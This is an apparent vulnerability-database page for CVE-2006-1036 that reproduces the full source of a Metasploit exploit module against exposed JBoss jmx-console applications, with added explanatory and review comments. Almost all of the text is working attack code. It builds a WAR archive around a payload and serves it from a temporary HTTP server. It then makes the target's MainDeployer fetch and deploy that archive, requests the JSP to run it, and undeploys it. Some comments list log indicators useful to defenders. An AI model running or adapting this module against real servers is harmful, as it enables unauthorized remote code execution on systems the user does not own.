| Reporter | Title | Published | Views | Family All 5 |
|---|---|---|---|---|
| CVE-2006-1036 | 7 Mar 2006 11:00 | – | cve | |
| CVE-2006-1036 | 7 Mar 2006 11:00 | – | cvelist | |
| EUVD-2006-1040 | 7 Oct 2025 00:30 | – | euvd | |
| CVE-2006-1036 | 7 Mar 2006 11:02 | – | nvd | |
| Design/Logic Flaw | 7 Mar 2006 11:02 | – | prion |
`##
# $Id: jboss_maindeployer.rb 8575 2010-02-21 01:44:34Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
# Reliability rank the author assigns to this module within the framework.
Rank = ExcellentRanking
# HTTP server mixin: supplies start_service / stop_service / send_response, which
# this module uses to hand the WAR archive to the server when it calls back.
include Msf::Exploit::Remote::HttpServer
# HTTP client mixin: supplies send_request_raw / send_request_cgi, which this
# module uses for every request it makes to the console.
include Msf::Exploit::Remote::HttpClient
# Declares the module's metadata, its target list and its user-settable options.
#
# Scope, as the description states it: JBoss servers whose "jmx-console"
# application is reachable and which can open an outbound HTTP connection back
# to the machine running the module. The defaults registered here are
# RPORT 8080 and PATH '/jmx-console'.
#
# info - Hash of metadata overrides handed down by the framework (default: {}).
def initialize(info = {})
  advisories = [
    [ 'CVE', '2006-1036' ],
    [ 'OSVDB', '33744' ],
    [ 'URL', 'http://www.redteam-pentesting.de/publications/2009-11-30-Whitepaper_Whos-the-JBoss-now_RedTeam-Pentesting_EN.pdf' ]
  ]

  target_list = [
    # Resolved at run time: exploit calls auto_target when this entry is selected.
    [ 'Automatic', { } ],
    # Platform specific targets only
    [ 'Windows Universal', { 'Arch' => ARCH_X86, 'Platform' => 'win' } ]
  ]

  module_info = {
    'Name' => 'JBoss JMX Console Deployer Upload and Execute',
    # Text kept flush-left: whitespace inside %q{} is part of the string.
    'Description' => %q{
This module can be used to execute a payload on JBoss servers that have
an exposed "jmx-console" application. The payload is put on the server by
using the jboss.system:MainDeployer functionality. To accomplish this, a
temporary HTTP server is created to serve a WAR archive containing our
payload. This method will only work if the target server allows outbound
connections to us.
},
    'Author' => [ 'jduck' ],
    'License' => MSF_LICENSE,
    'Version' => '$Revision: 8575 $',
    'References' => advisories,
    'Privileged' => true,
    'Platform' => [ 'win' ], # linux untested
    'Stance' => Msf::Exploit::Stance::Aggressive,
    'Targets' => target_list,
    'DefaultTarget' => 0
  }

  super(update_info(info, module_info))

  register_options(
    [
      Opt::RPORT(8080),
      OptString.new('PATH', [ true, "The URI path of the console", '/jmx-console'])
    ], self.class)
end
# Chooses a target entry when the user left the target on 'Automatic'.
#
# One GET is sent to the console's ServerInfo MBean page and a 200 is required.
# The response body is never parsed (see the TODO below): architecture and
# platform are fixed to x86 / Windows, so the request only confirms that the
# console answers without an error. In the server's access log it shows up as
# <PATH>/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo.
#
# Returns the first entry of `targets` with that platform and architecture, or
# nil when the request fails or no entry matches.
def auto_target
  print_status("Attempting to automatically select a target...")

  probe_uri = datastore['PATH'] + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
  reply = send_request_raw({ 'uri' => probe_uri }, 10)

  unless reply && reply.code == 200
    print_error("Failed: Error requesting #{probe_uri}")
    return nil
  end

  # TODO: detection requires HTML parsing
  wanted_arch = ARCH_X86
  wanted_plat = 'win'

  # First matching entry wins; find yields nil when nothing matches.
  targets.find do |candidate|
    candidate['Platform'] == wanted_plat && candidate['Arch'] == wanted_arch
  end
end
# Runs the whole sequence: resolve the target, build the WAR archive, serve it
# from a temporary local HTTP service, ask the console's MainDeployer to deploy
# it from that URL, wait for the server to fetch it, request the deployed JSP,
# undeploy the application and finally hand over to the payload handler.
#
# Network footprint, useful when reviewing logs for this activity:
#   1. POST <PATH>/HtmlAdaptor with action=invokeOp and
#      name=jboss.system:service=MainDeployer (deploy, then later undeploy).
#   2. An outbound HTTP request from the JBoss server for /<random>.war.
#   3. GET /<random>/<random>.jsp on the JBoss server.
# Both names are fresh random alphanumeric strings of 8 to 15 characters, so the
# stable indicators are the HtmlAdaptor POSTs and the server's outbound fetch,
# not the names.
#
# Two conditions visible in this method stop the sequence before anything is
# executed: a non-2xx answer to the deploy request (a 401 is reported with its
# challenge header) and the server never fetching the archive (for example when
# outbound connections from the server are not allowed).
#
# Raises RuntimeError when no target can be selected, when the deploy request
# gets no response or a non-2xx response, or when the archive is not requested
# in time.
def exploit
mytarget = target
if (target.name =~ /Automatic/)
mytarget = auto_target
if (not mytarget)
raise RuntimeError, "Unable to automatically select a target"
end
print_status("Automatically selected target \"#{mytarget.name}\"")
else
# NOTE(review): message reads "manually select"; "manually selected" was
# probably intended.
print_status("Using manually select target \"#{mytarget.name}\"")
end
# set arch/platform from the target
arch = mytarget['Arch']
plat = [Msf::Module::PlatformList.new(mytarget['Platform']).platforms[0]]
# Generate the WAR containing the EXE containing the payload.
# The JSP inside it gets a random 8-15 character name.
jsp_name = rand_text_alphanumeric(8+rand(8))
@war_data = Msf::Util::EXE.to_jsp_war(framework,
arch, plat,
payload.encoded,
:jsp_name => jsp_name)
#
# UPLOAD
#
# The application name is random as well; it becomes both the name of the
# served .war resource and the first path segment of the JSP requested later.
app_base = rand_text_alphanumeric(8+rand(8))
resource_uri = '/' + app_base + '.war'
# Plain http:// URL built from SRVHOST/SRVPORT: the server must be able to reach
# this address for the deployment to happen.
service_url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'] + resource_uri
print_status("Starting up our web service on #{service_url} ...")
# Only resource_uri is registered; requests for it are passed to on_request_uri.
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
print_status("Making the request to the MainDeployer...")
# The request built here sets no credentials. methodIndex is a position in the
# MBean's operation list; per the inline comment, 21 is the deploy operation
# taking a java.net.URL. NOTE(review): presumably that position differs between
# JBoss versions - confirm.
res = send_request_cgi({
'method' => 'POST',
'uri' => datastore['PATH'] + '/HtmlAdaptor',
'vars_post' =>
{
'action' => 'invokeOp',
'name' => 'jboss.system:service=MainDeployer',
'methodIndex' => '21', # deploy via java.net.URL
'arg0' => service_url
}
}, 20)
if (! res)
raise RuntimeError, "Unable to deploy WAR archive [No Response]"
end
# Any status outside 2xx aborts the run; a 401 additionally prints the
# authentication challenge the console sent.
if (res.code < 200 or res.code >= 300)
case res.code
when 401
print_error("Warning: The web site asked for authentication: #{res.headers['WWW-Authenticate'] || res.headers['Authentication']}")
end
# NOTE(review): "Upload to deploy" was probably meant to read "Unable to deploy".
raise RuntimeError, "Upload to deploy WAR archive [#{res.code} #{res.message}]"
end
# wait for the data to be sent
print_status("Waiting for the server to request the WAR archive....")
# Poll once per second (select with only a timeout acts as a sleep) until
# on_request_uri sets @war_sent; give up once more than 30 waits have passed.
# NOTE(review): this failure path and the ones above raise without calling
# stop_service here; cleanup is presumably left to the framework - confirm.
waited = 0
while (not @war_sent)
select(nil, nil, nil, 1)
waited += 1
if (waited > 30)
raise RuntimeError, 'Server did not request WAR archive -- Maybe it cant connect back to us?'
end
end
print_status("Shutting down the web service...")
stop_service
#
# EXECUTE
#
# A single GET for the JSP inside the freshly deployed application. Failure is
# only reported; the method carries on to the undeploy step either way.
print_status("Executing #{app_base}...")
res = send_request_cgi({
'uri' => '/' + app_base + '/' + jsp_name + '.jsp',
'method' => 'GET'
}, 20)
if (! res)
print_error("Execution failed on #{app_base} [No Response]")
elsif (res.code < 200 or res.code >= 300)
print_error("Execution failed on #{app_base} [#{res.code} #{res.message}]")
end
#
# DELETE
#
# Second invokeOp POST, this time asking MainDeployer to undeploy by name.
# A failure here is only printed, so the randomly named application can remain
# deployed on the server. This step is never reached when an earlier raise
# ended the run.
print_status("Undeploying #{app_base} ...")
res = send_request_cgi({
'method' => 'POST',
'uri' => datastore['PATH'] + '/HtmlAdaptor',
'vars_post' =>
{
'action' => 'invokeOp',
'name' => 'jboss.system:service=MainDeployer',
'methodIndex' => '3', # undeploy via java.String
'arg0' => app_base
}
}, 20)
if (! res)
print_error("WARNING: Undeployment failed on #{app_base} [No Response]")
elsif (res.code < 200 or res.code >= 300)
print_error("WARNING: Undeployment failed on #{app_base} [#{res.code} #{res.message}]")
end
# Hand control to the framework's payload handler.
handler
end
# Handle incoming requests from the server
# Callback for the temporary HTTP service: answers a request for the registered
# resource with the prepared WAR archive and records that it was sent.
#
# The requester is not checked; whichever client asks for the resource while
# the service is up receives the archive. A request that arrives before
# @war_data is set is reported and left unanswered by this method.
#
# cli     - client connection handed in by the HTTP service.
# request - the incoming request (not inspected here).
#
# Returns true after sending the archive, nil when it was not ready.
def on_request_uri(cli, request)
  if @war_data
    print_status("Sending the WAR archive to the server...")
    send_response(cli, @war_data)
    # exploit polls this flag to know the fetch happened.
    @war_sent = true
  else
    print_error("A request came in, but the WAR archive wasn't ready yet!")
    nil
  end
end
end
`